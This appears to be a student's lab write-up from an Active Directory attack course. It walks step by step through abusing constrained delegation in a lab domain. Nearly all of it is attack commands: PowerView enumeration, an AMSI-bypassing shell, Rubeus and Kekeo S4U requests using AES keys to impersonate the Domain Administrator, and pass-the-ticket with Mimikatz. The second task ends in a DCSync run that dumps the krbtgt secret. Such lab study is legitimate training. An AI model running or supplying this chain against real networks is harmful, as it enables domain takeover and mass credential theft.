Task 1
Enumerate users in the domain for whom Constrained Delegation is enabled.
For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
Pass the ticket and access the service
Use Invishell to and use PowerView to enumerate users with constrained delegation enabled.
Copy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1
PS C:\Users\student372> Get-DomainUser -TrustedToAuth
WebSVC has constrained delegation enabled. Since we already have websvc creds, we can use them to access the CIFS/dcorp-mssql as a domain admin.
As domain admin, we request TGS for websvc (first hop). This TGS is used to access the CIFS service.
Abuse with Rubeus
We use the websvc hash to request TGS as Domain Administrator from KDC and import it.
Copy # ArgSplit for "s4u"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
klist
Now we can access the CIFS service
Copy C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Abuse with Kekeo
Request a TGT from websvc.
Copy C:\Windows\system32>cd C:\AD\Tools\kekeo\x64
C:\AD\Tools\kekeo\x64>.\kekeo.exe
kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
We can use this TGT to request a TGS. We are requesting TGS to access CIFS/dcorp-mssql as DA.
Copy kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
Since the ticket is stored in a file, we can inject it in current session to use it. Open InviShell, Import Mimi, pass the ticket.
Copy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Invoke-Mimi.ps1
Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
We can now access the CIFS service.
Copy C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Task 2
Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
For such a user, request a TGT from the DC.
Obtain an alternate TGS for LDAP service on the target machine.
Use the TGS for executing DCSync attack.
We use Invishell and import PowerView to find users with constrained delegation.
Copy # InviShell and AMSI bypass, then PowerView:
PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1
# Enumerate Computers with Constrained Delegation enabled
PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth
dcorp-adminsrv has constrained delegation. Since we have AES keys of adminsrv, we use Rubeus to impersonate as Domain Admin.
Copy # ArgSplit for s4u
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
To abuse LDAP ticket we just imported, we use DCSync to dump the secrets.
Copy # Notice that we can replace the service since it is not encrypted. So instead of TIME, we replaced it with LDAP. Can do HTTP as well.
# ArgSplit lsadump::dcsync
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
Last updated 5 months ago